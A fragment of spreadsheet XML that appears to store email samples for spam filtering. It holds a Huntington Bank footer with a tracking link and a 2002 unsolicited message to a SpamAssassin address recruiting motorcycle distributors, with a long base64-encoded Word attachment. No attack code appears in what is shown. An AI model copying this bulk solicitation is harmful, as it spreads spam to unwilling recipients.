logoHuntington.Welcome. and Huntington Heads Up are federally registered service marks of Huntington Bancshares Incorporated.   2019 Huntington Bancshares Incorporated. [URL]https://www.huntington.com[/URL]</t>
  </si>
  <si>
    <t>https://u9218105.ct.sendgrid.net https://www.huntington.com</t>
  </si>
  <si>
    <t>5768</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: "Ms.Huang (Sales Manager)" &lt;motorcycle@qinghecq.com&gt;\nDate: Thu, 08 Aug 2002 18:51:44 +0800</t>
  </si>
  <si>
    <t>Thu, 08 Aug 2002 18:51:44 +0800</t>
  </si>
  <si>
    <t>"Ms.Huang (Sales Manager)" &lt;motorcycle@qinghecq.com&gt;</t>
  </si>
  <si>
    <t>China Motorcycle</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format\n--f09e4063-d1b9-43d5-bd3b-7955a9315611\nContent-Type: text/plain; charset=gb2312\nContent-Transfer-Encoding: quoted-printable\n\nDear Sir\nWe fetch your name by internet.\nThis month, our group had set up one JV with Korean Hyosung Motors &amp; =\nMachinery Inc\nOur company produces and distributes various whole motorcycle units =\n(displacement ranging from 48cc to 250cc, \nincluding two-wheel motorcycle and three-wheel motorcycle, for carrying goods =\nand taking passengers) and\n accessories especially main accessories of motorcycle, such as engine =\n(including crankcase, crankshaft\n connecting rod, carburetor, engine cylinder head, cylinder body, clutch, =\npiston and piston rings),\n frame, fuel tank, shock absorber, disk brake, panels, wheel hub and so on.\nSo far, they have sold very well to markets in many countries and areas =\naround Asia, Africa and Latin America,\n meanwhile, we establish service spots and sub-factories around there. We =\nwould now like to market the\n motorcycles and spare parts directly in your country. \nWe would appreciate your advise on whether your company would be interested =\nin \nacting as a distributor in the your country or if you have any =\nrecommendations on any other\n your country=A1=AFs associates who might also be interested. \nFor further information about our products, kindly please visit our web page: =\n\n[URL]http://www.cq114.com.cn[/URL]\n0QT-2.htm\nWe look forward to your reply.\nYours sincerely,\nMs.Huang (Sales Manager)\nFax: 86-23-67732102\nE-mail: motorcycle@qinghecq.com  \n\n--f09e4063-d1b9-43d5-bd3b-7955a9315611\nContent-Type: application/octet-stream; charset=iso-8859-1; file=Yinxiang Motorcycles.doc\nContent-Transfer-Encoding: base64\nContent-Disposition: attachment; filename=Yinxiang Motorcycles.doc\n\n0M8R4KGxGuEAAAAAAAAAAAAAAAAAAAAAPgADAP7/CQAGAAAAAAAAAAAAAAABAAAAeAAAAAAAAAAA\nEAAAegAAAAEAAAD+////AAAAAHcAAAD/////////////////////////////////////////////\n////////////////////////////////////////////////////////////////////////////\n////////////////////////////////////////////////////////////////////////////\n////////////////////////////////////////////////////////////////////////////\n////////////////////////////////////////////////////////////////////////////\n////////////////////////////////////////////////////////////////////////////\n////////////////////////////////////////////////////////////////////////////\n///////////////////////////////////////////////////////////////////////////s\npcEAOSAJBAAA+FK/AAAAAAAAEAAAAAAABAAAURIAAA4AYmpiav3P/c8AAAAAAAAAAAAAAAAAAAAA\nAAAECBYAMj4AAJ+lAACfpQAAawsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD//w8AAAAA\nAAAAAAD//w8AAAAAAAAAAAD//w8AAAAAAAAAAAAAAAAAAAAAAGwAAAAAAAoBAAAAAAAACgEAAAoB\nAAAAAAAACgEAAAAAAAAKAQAAAAAAAAoBAAAAAAAACgEAABQAAAAAAAAAAAAAAB4BAAAAAAAAsggA\nAAAAAACyCAAAAAAAALIIAAAAAAAAsggAABwAAADOCAAAjAAAAB4BAAAAAAAAKREAADIBAABmCQAA\nbAEAANIKAAAAAAAA0goAAAAAAADSCgAAAAAAANIKAAAAAAAA0goAAAAAAADSCgAAAAAAANIKAAAA\nAAAAhBAAAAIAAACGEAAAAAAAAIYQAAAAAAAAhhAAAAAAAACGEAAAAAAAAIYQAAAAAAAAhhAAACQA\nAABbEgAAIAIAAHsUAABgAAAAqhAAADkAAAAAAAAAAAAAAAAAAAAAAAAACgEAAAAAAADSCgAAAAAA\nAAAAAAAAAAAAAAAAAAAAAADSCgAAAAAAANIKAAAAAAAA0goAAAAAAADSCgAAAAAAAKoQAAAAAAAA\nTAwAAAAAAAAKAQAAAAAAAAoBAAAAAAAA0goAAAAAAAAAAAAAAAAAANIKAAAAAAAA4xAAABYAAABM\nDAAAAAAAAEwMAAAAAAAATAwAAAAAAADSCgAATAAAAAoBAAAAAAAA0goAAAAAAAAKAQAAAAAAANIK\nAAAAAAAAhBAAAAAAAAAAAAAAAAAAAEwMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAA0goAAAAAAACEEAAAAAAAAEwMAACEAQAATAwAAAAAAAAAAAAA\nAAAAANANAAAAAAAACgEAAAAAAAAKAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0A0AAAAAAADSCgAAAAAAAFoJAAAMAAAAgL71JPk5\nwgEeAQAAlAcAALIIAAAAAAAAHgsAAPoAAADQDQAAAAAAAAAAAAAAAAAA0A0AALQCAAD5EAAAMAAA\nACkRAAAAAAAA0A0AAAAAAADbFAAAAAAAABgMAAA0AAAA2xQAAAAAAADQDQAAAAAAAEwMAAAAAAAA\nHgEAAAAAAAAeAQAAAAAAAAoBAAAAAAAACgEAAAAAAAAKAQAAAAAAAAoBAAAAAAAAAgDZAAAAWWlu\neGlhbmcgTW90b3JjeWNsZQ0TIEhZUEVSTElOSyAiaHR0cDovL3d3dy5jcTExNC5jb20uY24vRW5n\nbGlzaC9wcm9kdWN0aW9uL2ppYW90b25neXMvbW90by9tb3RvemhhbnNoaS9ZWC9ZWDUwUVQtMi5o\ndG0iIAEUaHR0cDovL3d3dy5jcTExNC5jb20uY24vRW5nbGlzaC9wcm9kdWN0aW9uL2ppYW90b25n\neXMvbW90by9tb3RvemhhbnNoaS9ZWC9ZWDUwUVQtMi5odG0VDQ0TIEhZUEVSTElOSyAiaHR0cDov\nL3d3dy5jcTExNC5jb20uY24vRW5nbGlzaC9wcm9kdWN0aW9uL2ppYW90b25neXMvbW90by9tb3Rv\nemhhbnNoaS9ZWC9ZWC95eDUwUVQtMi5odG0iIFx0ICJyaWdodCIgFFlYNTBRVC0yFQcHEyBIWVBF\nUkxJTksgImh0dHA6Ly93d3cuY3ExMTQuY29tLmNuL0VuZ2xpc2gvcHJvZHVjdGlvbi9qaWFvdG9u\nZ3lzL21vdG8vbW90b3poYW5zaGkvWVgvWVgveXg1MFFULTMuaHRtIiBcdCAicmlnaHQiIBRZWDUw\nUVQtMxUHBxMgSFlQRVJMSU5LICJodHRwOi8vd3d3LmNxMTE0LmNvbS5jbi9FbmdsaXNoL3Byb2R1\nY3Rpb24vamlhb3Rvbmd5cy9tb3RvL21vdG96aGFuc2hpL1lYL1lYL3l4MTAwLUEuaHRtIiBcdCAi\ncmlnaHQiIBRZWDEwMC1BFQcHEyBIWVBFUkxJTksgImh0dHA6Ly93d3cuY3ExMTQuY29tLmNuL0Vu\nZ2xpc2gvcHJvZHVjdGlvbi9qaWFvdG9uZ3lzL21vdG8vbW90b3poYW5zaGkvWVgvWVgveXgxMTAt\nOS5odG0iIFx0ICJyaWdodCIgFFlYMTEwLTkVBwcTIEhZUEVSTElOSyAiaHR0cDovL3d3dy5jcTEx\nNC5jb20uY24vRW5nbGlzaC9wcm9kdWN0aW9uL2ppYW90b25neXMvbW90by9tb3RvemhhbnNoaS9Z\nWC9ZWC95eDEyNS1NLmh0bSIgXHQgInJpZ2h0IiAUWVgxMjUtTRUHBxMgSFlQRVJMSU5LICJodHRw\nOi8vd3d3LmNxMTE0LmNvbS5jbi9FbmdsaXNoL3Byb2R1Y3Rpb24vamlhb3Rvbmd5cy9tb3RvL21v\ndG96aGFuc2hpL1lYL1lYL3l4MTI1LU4uaHRtIiBcdCAicmlnaHQiIBRZWDEyNS1OFQcHEyBIWVBF\nUkxJTksgImh0dHA6Ly93d3cuY3ExMTQuY29tLmNuL0VuZ2xpc2gvcHJvZHVjdGlvbi9qaWFvdG9u\nZ3lzL21vdG8vbW90b3poYW5zaGkvWVgvWVgveXgxMjVULTkuaHRtIiBcdCAicmlnaHQiIBRZWDEy\nNVQtORUHBxMgSFlQRVJMSU5LICJodHRwOi8vd3d3LmNxMTE0LmNvbS5jbi9FbmdsaXNoL3Byb2R1\nY3Rpb24vamlhb3Rvbmd5cy9tb3RvL21vdG96aGFuc2hpL1lYL1lYL3l4MTUwLTcuaHRtIiBcdCAi\ncmlnaHQiIBRZWDE1MC03FQcHEyBIWVBFUkxJTksgImh0dHA6Ly93d3cuY3ExMTQuY29tLmNuL0Vu\nZ2xpc2gvcHJvZHVjdGlvbi9qaWFvdG9uZ3lzL21vdG8vbW90b3poYW5zaGkvWVgvWVgveXgxNTAt\nOC5odG0iIFx0ICJyaWdodCIgFFlYMTUwLTgVBwcTIEhZUEVSTElOSyAiaHR0cDovL3d3dy5jcTEx\nNC5jb20uY24vRW5nbGlzaC9wcm9kdWN0aW9uL2ppYW90b25neXMvbW90by9tb3RvemhhbnNoaS9Z\nWC9ZWC95eDE1MC1BLmh0bSIgXHQgInJpZ2h0IiAUWVgxNTAtQRUHBxMgSFlQRVJMSU5LICJodHRw\nOi8vd3d3LmNxMTE0LmNvbS5jbi9FbmdsaXNoL3Byb2R1Y3Rpb24vamlhb3Rvbmd5cy9tb3RvL21v\ndG96aGFuc2hpL1lYL1lYL3l4MTUwLUIuaHRtIiBcdCAicmlnaHQiIBRZWDE1MC1CFQcHEyBIWVBF\nUkxJTksgImh0dHA6Ly93d3cuY3ExMTQuY29tLmNuL0VuZ2xpc2gvcHJvZHVjdGlvbi9qaWFvdG9u\nZ3lzL21vdG8vbW90b3poYW5zaGkvWVgvWVgveXgxNTAtQy5odG0iIFx0ICJyaWdodCIgFFlYMTUw\nLUMVBwcTIEhZUEVSTElOSyAiaHR0cDovL3d3dy5jcTExNC5jb20uY24vRW5nbGlzaC9wcm9kdWN0\naW9uL2ppYW90b25neXMvbW90by9tb3RvemhhbnNoaS9ZWC9ZWC95eDE1MC1ELmh0bSIgXHQgInJp\nZ2h0IiAUWVgxNTAtRBUHBxMgSFlQRVJMSU5LICJodHRwOi8vd3d3LmNxMTE0LmNvbS5jbi9Fbmds\naXNoL3Byb2R1Y3Rpb24vamlhb3Rvbmd5cy9tb3RvL21vdG96aGFuc2hpL1lYL1lYL3l4MTUwLUUu\naHRtIiBcdCAicmlnaHQiIBRZWDE1MC1FFQcHEyBIWVBFUkxJTksgImh0dHA6Ly93d3cuY3ExMTQu\nY29tLmNuL0VuZ2xpc2gvcHJvZHVjdGlvbi9qaWFvdG9uZ3lzL21vdG8vbW90b3poYW5zaGkvWVgv\nWVgveXgyNTAuaHRtIiBcdCAicmlnaHQiIBRZWDI1MBUHBxMgSFlQRVJMSU5LICJodHRwOi8vd3d3\nLmNxMTE0LmNvbS5jbi9FbmdsaXNoL3Byb2R1Y3Rpb24vamlhb3Rvbmd5cy9tb3RvL2luZGV4Lmh0\nbSIgXHQgIl9wYXJlbnQiIBRiYWNrFQ0TIElOQ0xVREVQSUNUVVJFICJodHRwOi8vd3d3LmNxMTE0\nLmNvbS5jbi9FbmdsaXNoL3Byb2R1Y3Rpb24vamlhb3Rvbmd5cy9tb3RvL21vdG96aGFuc2hpL1lY\nL2ltYWdlcy9ZWDUwUVQtMi5qcGciIFwqIE1FUkdFRk9STUFUSU5FVCAUARUHBw0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GwAKgBjACoA\naAAI/20AbQApAAcAMQA4ADAAMAAqADYANwAwACoAMQAwADcANQAHAG0AYQB4AAj/SwBHAAn/BwA4\nADAABwAHAHcAaABlAGUAbABiAGEAcwBlACgAbQBtACkABwAxADIAMwA1AAcABwBmAHIAbwBuAHQA\nLQB3AGgAZQBlAGwAIABkAHIAaQB2AGUABwB0AHIAYQBpAGwAaQBuAGcAIAB3AGgAZQBlAGwABwAH\nAGUAbgBnAGkAbgBlAAcAWQBYADEAUAA0ADAARgBNAEIABwB0AHIAZQBhAGQABwAzAC4ANQAHADMA\nLgA1AC0AMQAwAAcABwBsAGkAZgB0AC0AbwBmAGYACP9NAE0ACf8HADEAMAAwAAcAaAB1AGIAYwBh\nAHAABwBjAHIAbwBvAG4ALwBzAHAAbwBrAGUABwBjAHIAbwBvAG4ALwBzAHAAbwBrAGUABwAHAG0A\nYQBzAHMACP9LAEcACf8HADEAMQAzAAcAZwBsAGkAcwBzAGEAZABlAAcAZwBvAG4AZwAvAGQAcgB1\nAG0ABwBnAG8AbgBnAAcABwB0AG8AcAAgAGIAbwBkAHkAdwBvAHIAawAI/0sATQAvAEgACf8HADUA\nMAAHAHIAZQB0AHIAbwBwAGEAYwBrAAcAZwByAGkAcAAgAGIAcgBhAGsAZQAHAGwAZQBnAGwAZQB0\nAAcABwBjAHUAYgBhAGcAZQAI/00ATAAJ/6AABwA0ADkABwBzAHQAYQByAHQAZQByAAcAdwBpAHIA\naQBuAGcALwBrAGkAYwBrACAAcwB0AGEAcgB0AGUAcgAHAAcADQBDAGgAaQBuAGEAIABDAGgAbwBu\nAGcAcQBpAG4AZwAgAEkAbgB0AGUAcgBuAGEAdABpAG8AbgBhAGwAIABFAGMAbwBuACYAVABlAGMA\naAAgAEUAeABjAGgAYQBuAGcAZQAgAEMAbwAuACwAIABMAHQAZAAuAAcABwANABMAIABIAFkAUABF\nAFIATABJAE4ASwAgACIAbQBhAGkAbAB0AG8AOgBFAC0AbQBhAGkAbAA6AHcAbAB3AGEAbgBnAEAA\ncAB1AGIAbABpAGMALgBjAHQAYQAuAGMAcQAuAGMAbgAiACAAFAATACAASQBOAEMATABVAEQARQBQ\nAEkAQwBUAFUAUgBFACAAIgBoAHQAdABwADoALwAvAHcAdwB3AC4AYwBxADEAMQA0AC4AYwBvAG0A\nLgBjAG4ALwBFAG4AZwBsAGkAcwBoAC8AaQBtAGEAZwBlAHMALwBlAG0AYQBpAGwAMgAuAGcAaQBm\nACIAIABcACoAIABNAEUAUgBHAEUARgBPAFIATQBBAFQASQBOAEUAVAAgABQAAQAVFQdUZWw6ODYt\nMjMtIDY3NjM1MDM1LTgwMDegIKAgRmF4Ojg2LTIzLTY3NzMyMTAyBwcHRW1haWw6ICB3ZWlsaW53\nYW5nQDE2My5uZXQHBw0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EAAATBAAAFAQA\nABUEAAB5BAAAegQAAHsEAADRBAAA0gQAANQEAADVBAAARwUAAEgFAABQBQAAUQUAAFIFAABTBQAA\nVAUAAMYFAADHBQAAzwUAANAFAADRBQAA0gUAANMFAABEBgAARQYAAEwGAABNBgAATgYAAE8GAABQ\nBgAAwQYAAMIGAADJBgAAygYAAMsGAADMBgAAzQYAAD4HAAA/BwAARgcAAEcHAABIBwAASQcAAEoH\nAAC7BwAAvAcAAMMHAADEBwAAxQcAAMYHAADHBwAAOQgAADoIAABCCAAAQwgAAEQIAABFCAAARggA\nALcIAAC4CAAAvwgAAMAIAADBCAAAwggAAMMIAAA0CQAANQkAADwJAAA9CQAAPgkAAD8JAABACQAA\nsQkAALIJAAC5CQAAugkAALsJAADz5eAA2ODV4NPgAODV4MzH4ADg1eDMx+AA4NXgzMfgAODV4MzH\n4ADg1eDMx+AA4NXgzMfgAODV4MzH4ADg1eDMx+AA4NXgzMfgAODV4MwAAAAACENKFABhShQAAAxD\nShgAT0oEAFFKBAAAA28oAQQwShAAAA8CCIEDagAAAAAGCAFVCAEJA2oAAAAAVQgBGjUIgUIqCk9K\nAwBRSgMAXAiBbygBcGgAgIAAABc1CIFCKgpPSgMAUUoDAFwIgXBoAICAAABOAAQAABQEAADTBAAA\n1AQAAFIFAABTBQAA0QUAANIFAABOBgAATwYAAMsGAADMBgAASAcAAEkHAADFBwAAxgcAAPoAAAAA\nAAAAAAAAAAD6AAAAAAAAAAAAAAAA+gAAAAAAAAAAAAAAAPQAAAAAAAAAAAAAAACC/AEAAAAAAAAA\nAAAA9AAAAAAAAAAAAAAAAIL0AQAAAAAAAAAAAAD0AAAAAAAAAAAAAAAAgvQBAAAAAAAAAAAAAPQA\nAAAAAAAAAAAAAACC9AEAAAAAAAAAAAAA9AAAAAAAAAAAAAAAAIL0AQAAAAAAAAAAAAD0AAAAAAAA\nAAAAAAAAgvwBAAAAAAAAAAAAAAAAcQAAFiQBFyQBSWYBAAAAAFQBAAKWDwAF1hgGEg8ABhIPAAYS\nDwAGEg8AAAAAAAAAAAAI1hoAAdT/9h+ABIgTBhIPAAYSDwAGEg8ABhIPAAnWAuAAEtYKAAAA////\nzAAAABPWMMz//wAGGgAAzP//AAYaAADM//8ABhoAAMz//wAGGgAAAAAA/wAAAAAAAAD/AAAAABT2\nAiQTFTYBGtYEzP//ABvWBMz//wAc1gTM//8AHdYEzP//ADPWBgABDwMHADTWBgABDwMPAGDWCgAA\nAP///8wAAABh9gMAAGLWBBoaGhoGAAAWJAFJZgEAAAAABA8AAyQBYSQBAA8ABAAAURIAAP4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gEBAcYHAABECAAARQgAAMEI\nAADCCAAAPgkAAD8JAAC7CQAAvAkAADgKAAA5CgAAtQoAALYKAAAyCwAAMwsAAK8LAAD5AAAAAAAA\nAAAAAAAAh/QBAAAAAAAAAAAAAPkAAAAAAAAAAAAAAACH9AEAAAAAAAAAAAAA+QAAAAAAAAAAAAAA\nAIf0AQAAAAAAAAAAAAD5AAAAAAAAAAAAAAAAh/QBAAAAAAAAAAAAAPkAAAAAAAAAAAAAAACH9AEA\nAAAAAAAAAAAA+QAAAAAAAAAAAAAAAIf0AQAAAAAAAAAAAAD5AAAAAAAAAAAAAAAAh/QBAAAAAAAA\nAAAAAPkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABxAAAWJAEXJAFJZgEAAAAAVAEAApYPAAXWGAYS\nDwAGEg8ABhIPAAYSDwAAAAAAAAAAAAjWGgAB1P/2H4AEiBMGEg8ABhIPAAYSDwAGEg8ACdYC4AAS\n1goAAAD////MAAAAE9YwzP//AAYaAADM//8ABhoAAMz//wAGGgAAzP//AAYaAAAAAAD/AAAAAAAA\nAP8AAAAAFPYCJBMVNgEa1gTM//8AG9YEzP//ABzWBMz//wAd1gTM//8AM9YGAAEPAwcANNYGAAEP\nAw8AYNYKAAAA////zAAAAGH2AwAAYtYEGhoaGgYAABYkAUlmAQAAAAAPuwkAALwJAAC9CQAALgoA\nAC8KAAA2CgAANwoAADgKAAA5CgAAOgoAAKsKAACsCgAAswoAALQKAAC1CgAAtgoAALcKAAAoCwAA\nKQsAADALAAAxCwAAMgsAADMLAAA0CwAApQsAAKYLAACtCwAArgsAAK8LAACwCwAAsQsAACAMAAAh\nDAAAJgwAACcMAAAoDAAAKQwAACoMAACJDAAAigwAAI4MAACPDAAAkAwAAJEMAAAUDQAAFQ0AABYN\nAAAXDQAAGA0AABkNAAAADgAAEg4AABQOAAAuDgAAMA4AAD4OAABADgAARA4AAEYOAABiDgAAZA4A\nAGwOAABuDgAAcA4AAJIOAACUDgAAsA4AALIOAADADgAAwg4AANQOAADWDgAA4A4AAOIOAADoDgAA\n6g4AAPYOAAD4DgAAEg8AABQPAAAaDwAAHA8AACgPAAAqDwAAQA8AAEIPAAD79gD28/bs+/YA9vP2\n7Pv2APbz9uz79gD28/bs+/YA9vP27Pv2APbz9gD2APbn9uz75fvs++z77Pvs++z77N777Pvs++z7\n7Pvs++z77Pvs++z77PvsAAAAAAAAAAAAAAAAAAAADENKBABPSgQAUUoEAAADPAiBCQNq0QEAAFUI\nAQxDShgAT0oEAFFKBAAABDBKEAAACQNqAAAAAFUIAQhDShQAYUoUAFWvCwAAsAsAACgMAAApDAAA\nkAwAABgNAAAZDQAAGg0AAI3kAQAAAAAAAAAAAACHAAAAAAAAAAAAAAAAjQAAAAAAAAAAAAAAAIIA\nAAAAAAAAAAAAAACHAAAAAAAAAAAAAAAATAAAAAAAAAAAAAAAAEoAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAA1AAAWJAEXJAFJZgEAAAAAVAEACNYaAAHx/9ofgASIEwAA\nAAAAAAAAAAAAAAAAAAAU9gIkExU2ARrWBAAAAP8b1gQAAAD/HNYEAAAA/x3WBAAAAP8z1gYAAQ8D\nAAA01gYAAQ8DAABh9gMAAAAEDwADJAFhJAEGAAAWJAFJZgEAAAAAcQAAFiQBFyQBSWYBAAAAAFQB\nAAKWDwAF1hgGEg8ABhIPAAYSDwAGEg8AAAAAAAAAAAAI1hoAAdT/9h+ABIgTBhIPAAYSDwAGEg8A\nBhIPAAnWAuAAEtYKAAAA////zAAAABPWMMz//wAGGgAAzP//AAYaAADM//8ABhoAAMz//wAGGgAA\nAAAA/wAAAAAAAAD/AAAAABT2AiQTFTYBGtYEzP//ABvWBMz//wAc1gTM//8AHdYEzP//ADPWBgAB\nDwMHADTWBgABDwMPAGDWCgAAAP///8wAAABh9gMAAGLWBBoaGhoABxoNAAAUDgAAMA4AAEAOAABG\nDgAASA4AAPMAAAAAAAAAAAAAAADzAAAAAAAAAAAAAAAA8wAAAAAAAAAAAAAAAPMAAAAAAAAAAAAA\nAAAw2AAAAAAAAAAAAAAAAAAAAAAAAADCAAAWJAEXJAFJZgEAAAAClg8ABdYYBhIPAAYSDwAGEg8A\nBhIPAAAAAAAAAAAAB5QtAAjWXAAExP8AB0wOZxOuIIAGsQMGEg8ABhIPAAYSDwAGEg8AgAaxAwYS\nDwAGEg8ABhIPAAYSDwCABrEDBhIPAAYSDwAGEg8ABhIPAIAGugkGEg8ABhIPAAYSDwAGEg8ACdYI\nwADAAMAAwAAS1igAAAD//NzTAAAAAAAA//zc0wAAAAAAAP/83NMAAAAAAAD//NzTAAAAE9YwzP//\nAAYaAADM//8ABhoAAMz//wAGGgAAzP//AAYaAAAAAAD/AAAAAAAAAP8AAAAAFPYCiBMVNgEa1hDM\n//8AzP//AMz//wDM//8AG9YQzP//AMz//wDM//8AzP//ABzWEMz//wDM//8AzP//AMz//wAd1hDM\n//8AzP//AMz//wDM//8AM9YGAAEPAw8ANNYGAAEPAw8AYNYKAAAA//zc0wAAAGH2AwAAYtYQGhoa\nGhoaGhoaGhoaGhoaGgwAAAMkARJkLQAAABYkAUlmAQAAAGEkAQAFSA4AAGQOAABuDgAAcA4AAJQO\nAACyDgAA8wAAAAAAAAAAAAAAAPMAAAAAAAAAAAAAAADqAAAAAAAAAAAAAAAA8wAAAAAAAAAAAAAA\nAPM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CQAAAyQB\nFiQBSWYBAAAAYSQBDAAAAyQBEmQtAAAAFiQBSWYBAAAAYSQBAAWyDgAAtA4AAMIOAAAhjAAAAAAA\nAAAAAAAAFQAAAAAAAAAAAAAAAAAAAAAMAAADJAESZC0AAAAWJAFJZgEAAABhJAEA3QAAFiQBFyQB\nSWYBAAAAApYPAAXWGAYSDwAGEg8ABhIPAAYSDwAAAAAAAAAAAAeULQAI1nIABcT/AAdMDmcTnhmu\nIIAGsQMGEg8ABhIPAAYSDwAGEg8AgAaxAwYSDwAGEg8ABhIPAAYSDwCABrEDBhIPAAYSDwAGEg8A\nBhIPAIAGgwQGEg8ABhIPAAYSDwAGEg8AgAbdBAYSDwAGEg8ABhIPAAYSDwAJ1grAAMAAwADAAMAA\nEtYyAAAA//zc0wAAAAAAAP/83NMAAAAAAAD//NzTAAAAAAAA//zc0wAAAAAAAP/83NMAAAAT1jDM\n//8ABhoAAMz//wAGGgAAzP//AAYaAADM//8ABhoAAAAAAP8AAAAAAAAA/wAAAAAU9gKIExU2ARrW\nFMz//wDM//8AzP//AMz//wDM//8AG9YUzP//AMz//wDM//8AzP//AMz//wAc1hTM//8AzP//AMz/\n/wDM//8AzP//AB3WFMz//wDM//8AzP//AMz//wDM//8AM9YGAAEPAw8ANNYGAAEPAw8AYNYKAAAA\n//zc0wAAAGH2AwAAYtYUGhoaGhoaGhoaGhoaGhoaGhoaGhoAAsIOAADWDgAA4g4AAOoOAAD4DgAA\n8wAAAAAAAAAAAAAAAPMAAAAAAAAAAAAAAADzAAAAAAAAAAAAAAAA8w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wAAAMkARJkLQAAABYkAUlmAQAAAGEkAQAE+A4AAPoOAAAUDwAAIcQAAAAAAAAA\nAAAAABUAAAAAAAAAAAAAAAAAAAAADAAAAyQBEmQeAAAAFiQBSWYBAAAAYSQBAN0AABYkARckAUlm\nAQAAAAKWDwAF1hgGEg8ABhIPAAYSDwAGEg8AAAAAAAAAAAAHlC0ACNZyAAXE/wAHTA5nE54ZriCA\nBrEDBhIPAAYSDwAGEg8ABhIPAIAGsQMGEg8ABhIPAAYSDwAGEg8AgAaxAwYSDwAGEg8ABhIPAAYS\nDwCABoMEBhIPAAYSDwAGEg8ABhIPAIAG3QQGEg8ABhIPAAYSDwAGEg8ACdYKwADAAMAAwADAABLW\nMgAAAP/83NMAAAAAAAD//NzTAAAAAAAA//zc0wAAAAAAAP/83NMAAAAAAAD//NzTAAAAE9YwzP//\nAAYaAADM//8ABhoAAMz//wAGGgAAzP//AAYaAAAAAAD/AAAAAAAAAP8AAAAAFPYCiBMVNgEa1hTM\n//8AzP//AMz//wDM//8AzP//ABvWFMz//wDM//8AzP//AMz//wDM//8AHNYUzP//AMz//wDM//8A\nzP//AMz//wAd1hTM//8AzP//AMz//wDM//8AzP//ADPWBgABDwMPADTWBgABDwMPAGDWCgAAAP/8\n3NMAAABh9gMAAGLWFBoaGhoaGhoaGhoaGhoaGhoaGhoaAAIUDwAAHA8AACoPAABCDwAAWg8AAPMA\nAAAAAAAAAAAAAADzAAAAAAAAAAAAAAAA8wAAAAAAAAAAAAAAAPM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MAAADJAESZB4AAAAWJAFJZgEAAABhJAEABEIPAABYDwAAWg8AAGwPAABuDwAAdA8A\nAHYPAACGDwAAiA8AAJoPAACcDwAApA8AAKYPAADMDwAAzg8AANIPAADUDwAA5g8AAOgPAAD8DwAA\n/g8AAAoQAAAMEAAAJBAAACYQAAAqEAAALBAAADoQAAA8EAAAYhAAAGQQAABmEAAAaBAAANwQAADe\nEAAA4BAAAOIQAADkEAAAShEAAEwRAABOEQAA/BEAAP4RAAAAEgAAARIAAAISAAADEgAAMRIAADIS\nAAAzEgAANBIAAE4SAABPEgAAUBIAAFESAAD27+rv6u/q7+rv6u/q7+rv6u/q7+rv6u/q7+rv6u/q\n6NwA6ujU0NS/3L+uv9QA3O/q76CY6pYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANvKAEPQ0oY\nAE9KBABRSgQAbygBGjUIgUIqAkNKFABcCIFhShQAbygBcGgAAP8AACADaiFNAAA1CIFCKgJDShQA\nVQgBXAiBYUoUAHBoAAD/AAAgA2oAAAAANQiBQioCQ0oUAFUIAVwIgWFKFABwaAAA/wAABjUIgVwI\ngQAPA2oAAAAANQiBVQgBXAiBFzUIgUIqAkNKFABcCIFhShQAcGgAAP8AAzwIgQhDShQAYUoUAAAM\nQ0oYAE9KBABRSgQAABFCKgZDShQAYUoUAHBo/wAAAAA2Wg8AAFwPAABuDwAAIZgAAAAAAAAAAAAA\nABUAAAAAAAAAAAAAAAAAAAAADAAAAyQBEmQeAAAAFiQBSWYBAAAAYSQBAN0AABYkARckAUlmAQAA\nAAKWDwAF1hgGEg8ABhIPAAYSDwAGEg8AAAAAAAAAAAAHlB4ACNZyAAXE/wAHTA5nE54ZriCABrED\nBhIPAAYSDwAGEg8ABhIPAIAGsQMGEg8ABhIPAAYSDwAGEg8AgAaxAwYSDwAGEg8ABhIPAAYSDwCA\nBoMEBhIPAAYSDwAGEg8ABhIPAIAG3QQGEg8ABhIPAAYSDwAGEg8ACdYKwADAAMAAwADAABLWMgAA\nAP/83NMAAAAAAAD//NzTAAAAAAAA//zc0wAAAAAAAP/83NMAAAAAAAD//NzTAAAAE9YwzP//AAYa\nAADM//8ABhoAAMz//wAGGgAAzP//AAYaAAAAAAD/AAAAAAAAAP8AAAAAFPYCiBMVNgEa1hTM//8A\nzP//AMz//wDM//8AzP//ABvWFMz//wDM//8AzP//AMz//wDM//8AHNYUzP//AMz//wDM//8AzP//\nAMz//wAd1hTM//8AzP//AMz//wDM//8AzP//ADPWBgABDwMPADTWBgABDwMPAGDWCgAAAP/83NMA\nAABh9gMAAGLWFBoaGhoaGhoaGhoaGhoaGhoaGhoaAAJuDwAAdg8AAIgPAACcDwAApg8AAPMAAAAA\nAAAAAAAAAADzAAAAAAAAAAAAAAAA8wAAAAAAAAAAAAAAAPM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MAAADJAESZB4AAAAWJAFJZgEAAABhJAEABKYPAACoDwAAzg8AACHMAAAAAAAAAAAAAAAV\nAAAAAAAAAAAAAAAAAAAAAAwAAAMkARJkHgAAABYkAUlmAQAAAGEkAQDdAAAWJAEXJAFJZgEAAAAC\nlg8ABdYYBhIPAAYSDwAGEg8ABhIPAAAAAAAAAAAAB5QeAAjWcgAFxP8AB0wOZxOeGa4ggAaxAwYS\nDwAGEg8ABhIPAAYSDwCABrEDBhIPAAYSDwAGEg8ABhIPAIAGsQMGEg8ABhIPAAYSDwAGEg8AgAaD\nBAYSDwAGEg8ABhIPAAYSDwCABt0EBhIPAAYSDwAGEg8ABhIPAAnWCsAAwADAAMAAwAAS1jIAAAD/\n/NzTAAAAAAAA//zc0wAAAAAAAP/83NMAAAAAAAD//NzTAAAAAAAA//zc0wAAABPWMMz//wAGGgAA\nzP//AAYaAADM//8ABhoAAMz//wAGGgAAAAAA/wAAAAAAAAD/AAAAABT2AogTFTYBGtYUzP//AMz/\n/wDM//8AzP//AMz//wAb1hTM//8AzP//AMz//wDM//8AzP//ABzWFMz//wDM//8AzP//AMz//wDM\n//8AHdYUzP//AMz//wDM//8AzP//AMz//wAz1gYAAQ8DDwA01gYAAQ8DDwBg1goAAAD//NzTAAAA\nYfYDAABi1hQaGhoaGhoaGhoaGhoaGhoaGhoaG